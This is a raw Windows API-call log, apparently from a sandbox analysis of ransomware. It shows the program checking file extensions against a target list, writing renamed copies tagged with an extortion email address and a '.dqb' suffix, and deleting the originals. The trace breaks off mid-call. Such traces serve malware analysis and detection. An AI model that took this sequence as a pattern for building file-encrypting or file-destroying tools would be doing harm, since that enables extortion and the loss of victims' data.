lstrcmpiW (lpString1=".doc", lpString2=".png") returned -1 [0272.087] lstrcmpiW (lpString1=".docx", lpString2="2.png") returned -1 [0272.087] lstrcmpiW (lpString1=".pdf", lpString2=".png") returned -1 [0272.087] lstrcmpiW (lpString1=".xls", lpString2=".png") returned 1 [0272.087] lstrcmpiW (lpString1=".xlsx", lpString2="2.png") returned -1 [0272.087] lstrcmpiW (lpString1=".ppt", lpString2=".png") returned 1 [0272.087] lstrcmpiW (lpString1=".zip", lpString2=".png") returned 1 [0272.087] lstrcmpiW (lpString1=".rar", lpString2=".png") returned 1 [0272.087] lstrcmpiW (lpString1=".bz2", lpString2=".png") returned -1 [0272.087] lstrcmpiW (lpString1=".7z", lpString2="png") returned -1 [0272.087] lstrcmpiW (lpString1=".dbf", lpString2=".png") returned -1 [0272.087] lstrcmpiW (lpString1=".1cd", lpString2=".png") returned -1 [0272.087] lstrcmpiW (lpString1=".jpg", lpString2=".png") returned -1 [0272.087] lstrcmpiW (lpString1=".png", lpString2=".dqb") returned 1 [0272.087] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\scenebuttonsubpicture.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0272.270] GetFileSizeEx (in: hFile=0x324, lpFileSize=0x2c0ff1c | out: lpFileSize=0x2c0ff1c*=3119) returned 1 [0272.270] CloseHandle (hObject=0x324) returned 1 [0272.270] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\scenebuttonsubpicture.png")) returned 0x20 [0272.276] GetFileAttributesW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonSubpicture.png.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\scenebuttonsubpicture.png.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0272.276] CreateFileW (lpFileName="C:\\Program Files\\DVD Maker\\Shared\\DvdStyles\\Sports\\SceneButtonSubpicture.png" (normalized: "c:\\program files\\dvd maker\\shared\\dvdstyles\\sports\\scenebuttonsubpicture.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0274.567] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00172_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0274.695] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00172_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x310 [0274.724] SetFilePointerEx (in: hFile=0x310, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.726] SetFilePointerEx (in: hFile=0x310, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.728] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00172_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x324 [0274.740] GetLastError () returned 0x0 [0274.740] ReadFile (in: hFile=0x310, lpBuffer=0x37e0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fed4, lpOverlapped=0x0 | out: lpBuffer=0x37e0020*, lpNumberOfBytesRead=0x2c0fed4*=0xa8c, lpOverlapped=0x0) returned 1 [0274.770] WriteFile (in: hFile=0x324, lpBuffer=0x37e0020*, nNumberOfBytesToWrite=0xa90, lpNumberOfBytesWritten=0x2c0fc9c, lpOverlapped=0x0 | out: lpBuffer=0x37e0020*, lpNumberOfBytesWritten=0x2c0fc9c*=0xa90, lpOverlapped=0x0) returned 1 [0274.771] ReadFile (in: hFile=0x310, lpBuffer=0x37e0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fed4, lpOverlapped=0x0 | out: lpBuffer=0x37e0020*, lpNumberOfBytesRead=0x2c0fed4*=0x0, lpOverlapped=0x0) returned 1 [0274.771] WriteFile (in: hFile=0x324, lpBuffer=0x37e0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c0fc9c, lpOverlapped=0x0 | out: lpBuffer=0x37e0020*, lpNumberOfBytesWritten=0x2c0fc9c*=0xec, lpOverlapped=0x0) returned 1 [0274.771] SetEndOfFile (hFile=0x324) returned 1 [0274.774] CloseHandle (hObject=0x324) returned 1 [0274.774] SetFilePointerEx (in: hFile=0x310, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.774] SetEndOfFile (hFile=0x310) returned 1 [0274.776] CloseHandle (hObject=0x310) returned 1 [0274.776] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0274.784] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ed00172_.wmf")) returned 1 [0274.784] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF") returned 63 [0274.784] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF") returned 63 [0274.784] lstrlenW (lpString=".doc") returned 4 [0274.784] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.784] lstrlenW (lpString=".docx") returned 5 [0274.784] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.784] lstrlenW (lpString=".pdf") returned 4 [0274.784] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.784] lstrlenW (lpString=".xls") returned 4 [0274.784] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.784] lstrlenW (lpString=".xlsx") returned 5 [0274.784] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.784] lstrlenW (lpString=".ppt") returned 4 [0274.784] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.785] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF") returned 63 [0274.785] lstrlenW (lpString=".zip") returned 4 [0274.785] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.785] lstrlenW (lpString=".rar") returned 4 [0274.785] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.785] lstrlenW (lpString=".bz2") returned 4 [0274.785] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.785] lstrlenW (lpString=".7z") returned 3 [0274.785] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.785] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF") returned 63 [0274.785] lstrlenW (lpString=".dbf") returned 4 [0274.785] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.785] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF") returned 63 [0274.785] lstrlenW (lpString=".1cd") returned 4 [0274.785] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.785] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF") returned 63 [0274.785] lstrlenW (lpString=".jpg") returned 4 [0274.785] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.785] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF") returned 63 [0274.785] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF") returned 63 [0274.785] lstrlenW (lpString=".doc") returned 4 [0274.785] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.785] lstrlenW (lpString=".docx") returned 5 [0274.785] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.785] lstrlenW (lpString=".pdf") returned 4 [0274.785] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.785] lstrlenW (lpString=".xls") returned 4 [0274.785] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.785] lstrlenW (lpString=".xlsx") returned 5 [0274.785] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.785] lstrlenW (lpString=".ppt") returned 4 [0274.786] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.786] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF") returned 63 [0274.786] lstrlenW (lpString=".zip") returned 4 [0274.786] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.786] lstrlenW (lpString=".rar") returned 4 [0274.786] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.786] lstrlenW (lpString=".bz2") returned 4 [0274.786] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.786] lstrlenW (lpString=".7z") returned 3 [0274.786] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.786] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF") returned 63 [0274.786] lstrlenW (lpString=".dbf") returned 4 [0274.786] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.786] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF") returned 63 [0274.786] lstrlenW (lpString=".1cd") returned 4 [0274.786] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.786] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\ED00172_.WMF") returned 63 [0274.786] lstrlenW (lpString=".jpg") returned 4 [0274.786] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.786] lstrcmpiW (lpString1=".WMF", lpString2=".dqb") returned 1 [0274.786] lstrlenW (lpString="EN00242_.WMF") returned 12 [0274.786] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00242_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0274.819] GetFileSizeEx (in: hFile=0x32c, lpFileSize=0x2c0ff1c | out: lpFileSize=0x2c0ff1c*=6780) returned 1 [0274.819] CloseHandle (hObject=0x32c) returned 1 [0274.819] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00242_.wmf")) returned 0x20 [0274.819] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00242_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0274.819] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00242_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x32c [0274.819] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.819] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.819] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00242_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0274.820] GetLastError () returned 0x0 [0274.820] ReadFile (in: hFile=0x32c, lpBuffer=0x37e0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fed4, lpOverlapped=0x0 | out: lpBuffer=0x37e0020*, lpNumberOfBytesRead=0x2c0fed4*=0x1a7c, lpOverlapped=0x0) returned 1 [0274.832] WriteFile (in: hFile=0x330, lpBuffer=0x37e0020*, nNumberOfBytesToWrite=0x1a80, lpNumberOfBytesWritten=0x2c0fc9c, lpOverlapped=0x0 | out: lpBuffer=0x37e0020*, lpNumberOfBytesWritten=0x2c0fc9c*=0x1a80, lpOverlapped=0x0) returned 1 [0274.833] ReadFile (in: hFile=0x32c, lpBuffer=0x37e0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fed4, lpOverlapped=0x0 | out: lpBuffer=0x37e0020*, lpNumberOfBytesRead=0x2c0fed4*=0x0, lpOverlapped=0x0) returned 1 [0274.833] WriteFile (in: hFile=0x330, lpBuffer=0x37e0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c0fc9c, lpOverlapped=0x0 | out: lpBuffer=0x37e0020*, lpNumberOfBytesWritten=0x2c0fc9c*=0xec, lpOverlapped=0x0) returned 1 [0274.833] SetEndOfFile (hFile=0x330) returned 1 [0274.834] CloseHandle (hObject=0x330) returned 1 [0274.834] SetFilePointerEx (in: hFile=0x32c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.834] SetEndOfFile (hFile=0x32c) returned 1 [0274.861] CloseHandle (hObject=0x32c) returned 1 [0274.861] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0274.883] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00242_.wmf")) returned 1 [0274.883] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF") returned 63 [0274.883] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF") returned 63 [0274.883] lstrlenW (lpString=".doc") returned 4 [0274.883] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.883] lstrlenW (lpString=".docx") returned 5 [0274.883] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.883] lstrlenW (lpString=".pdf") returned 4 [0274.883] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.883] lstrlenW (lpString=".xls") returned 4 [0274.883] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.883] lstrlenW (lpString=".xlsx") returned 5 [0274.883] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.884] lstrlenW (lpString=".ppt") returned 4 [0274.884] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.884] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF") returned 63 [0274.884] lstrlenW (lpString=".zip") returned 4 [0274.884] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.884] lstrlenW (lpString=".rar") returned 4 [0274.884] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.884] lstrlenW (lpString=".bz2") returned 4 [0274.884] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.884] lstrlenW (lpString=".7z") returned 3 [0274.884] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.884] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF") returned 63 [0274.884] lstrlenW (lpString=".dbf") returned 4 [0274.884] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.884] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF") returned 63 [0274.884] lstrlenW (lpString=".1cd") returned 4 [0274.884] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.884] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF") returned 63 [0274.884] lstrlenW (lpString=".jpg") returned 4 [0274.884] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.884] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF") returned 63 [0274.884] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF") returned 63 [0274.884] lstrlenW (lpString=".doc") returned 4 [0274.884] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.884] lstrlenW (lpString=".docx") returned 5 [0274.884] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.884] lstrlenW (lpString=".pdf") returned 4 [0274.885] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.885] lstrlenW (lpString=".xls") returned 4 [0274.885] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.885] lstrlenW (lpString=".xlsx") returned 5 [0274.885] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.885] lstrlenW (lpString=".ppt") returned 4 [0274.885] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.885] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF") returned 63 [0274.885] lstrlenW (lpString=".zip") returned 4 [0274.885] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.885] lstrlenW (lpString=".rar") returned 4 [0274.885] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.885] lstrlenW (lpString=".bz2") returned 4 [0274.885] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.885] lstrlenW (lpString=".7z") returned 3 [0274.885] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.885] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF") returned 63 [0274.885] lstrlenW (lpString=".dbf") returned 4 [0274.885] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.885] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF") returned 63 [0274.885] lstrlenW (lpString=".1cd") returned 4 [0274.885] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.885] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00242_.WMF") returned 63 [0274.885] lstrlenW (lpString=".jpg") returned 4 [0274.885] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.885] lstrcmpiW (lpString1=".WMF", lpString2=".dqb") returned 1 [0274.885] lstrlenW (lpString="EN00902_.WMF") returned 12 [0274.885] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00902_.wmf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0274.890] GetFileSizeEx (in: hFile=0x31c, lpFileSize=0x2c0ff1c | out: lpFileSize=0x2c0ff1c*=7944) returned 1 [0274.890] CloseHandle (hObject=0x31c) returned 1 [0274.890] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00902_.wmf")) returned 0x20 [0274.890] GetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00902_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb")) returned 0xffffffff [0274.890] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00902_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x31c [0274.890] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.890] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.891] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00902_.wmf.id-9c354b42.[btcdecoding@qq.com].dqb"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x330 [0274.891] GetLastError () returned 0x0 [0274.891] ReadFile (in: hFile=0x31c, lpBuffer=0x37e0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fed4, lpOverlapped=0x0 | out: lpBuffer=0x37e0020*, lpNumberOfBytesRead=0x2c0fed4*=0x1f08, lpOverlapped=0x0) returned 1 [0274.892] WriteFile (in: hFile=0x330, lpBuffer=0x37e0020*, nNumberOfBytesToWrite=0x1f10, lpNumberOfBytesWritten=0x2c0fc9c, lpOverlapped=0x0 | out: lpBuffer=0x37e0020*, lpNumberOfBytesWritten=0x2c0fc9c*=0x1f10, lpOverlapped=0x0) returned 1 [0274.893] ReadFile (in: hFile=0x31c, lpBuffer=0x37e0020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2c0fed4, lpOverlapped=0x0 | out: lpBuffer=0x37e0020*, lpNumberOfBytesRead=0x2c0fed4*=0x0, lpOverlapped=0x0) returned 1 [0274.893] WriteFile (in: hFile=0x330, lpBuffer=0x37e0020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2c0fc9c, lpOverlapped=0x0 | out: lpBuffer=0x37e0020*, lpNumberOfBytesWritten=0x2c0fc9c*=0xec, lpOverlapped=0x0) returned 1 [0274.894] SetEndOfFile (hFile=0x330) returned 1 [0274.894] CloseHandle (hObject=0x330) returned 1 [0274.894] SetFilePointerEx (in: hFile=0x31c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2c0fec8 | out: lpNewFilePointer=0x0) returned 1 [0274.894] SetEndOfFile (hFile=0x31c) returned 1 [0274.896] CloseHandle (hObject=0x31c) returned 1 [0274.896] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF.id-9C354B42.[btcdecoding@qq.com].dqb", dwFileAttributes=0x20) returned 1 [0274.896] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\en00902_.wmf")) returned 1 [0274.896] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF") returned 63 [0274.896] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF") returned 63 [0274.896] lstrlenW (lpString=".doc") returned 4 [0274.896] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.896] lstrlenW (lpString=".docx") returned 5 [0274.896] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.896] lstrlenW (lpString=".pdf") returned 4 [0274.896] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.896] lstrlenW (lpString=".xls") returned 4 [0274.896] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.896] lstrlenW (lpString=".xlsx") returned 5 [0274.896] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.897] lstrlenW (lpString=".ppt") returned 4 [0274.897] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.897] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF") returned 63 [0274.897] lstrlenW (lpString=".zip") returned 4 [0274.897] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.897] lstrlenW (lpString=".rar") returned 4 [0274.897] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.897] lstrlenW (lpString=".bz2") returned 4 [0274.897] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0274.897] lstrlenW (lpString=".7z") returned 3 [0274.897] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0274.897] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF") returned 63 [0274.897] lstrlenW (lpString=".dbf") returned 4 [0274.897] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0274.897] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF") returned 63 [0274.897] lstrlenW (lpString=".1cd") returned 4 [0274.897] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0274.897] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF") returned 63 [0274.897] lstrlenW (lpString=".jpg") returned 4 [0274.897] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0274.898] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF") returned 63 [0274.898] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF") returned 63 [0274.898] lstrlenW (lpString=".doc") returned 4 [0274.898] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0274.898] lstrlenW (lpString=".docx") returned 5 [0274.898] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0274.898] lstrlenW (lpString=".pdf") returned 4 [0274.898] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0274.898] lstrlenW (lpString=".xls") returned 4 [0274.898] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0274.898] lstrlenW (lpString=".xlsx") returned 5 [0274.898] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0274.898] lstrlenW (lpString=".ppt") returned 4 [0274.898] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0274.898] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\EN00902_.WMF") returned 63 [0274.898] lstrlenW (lpString=".zip") returned 4 [0274.898] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0274.898] lstrlenW (lpString=".rar") returned 4 [0274.898] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0274.898] lstrlenW (lpString=".bz2") returned 4 [0274.898] lstrcmpiW (lpString1=".bz2", 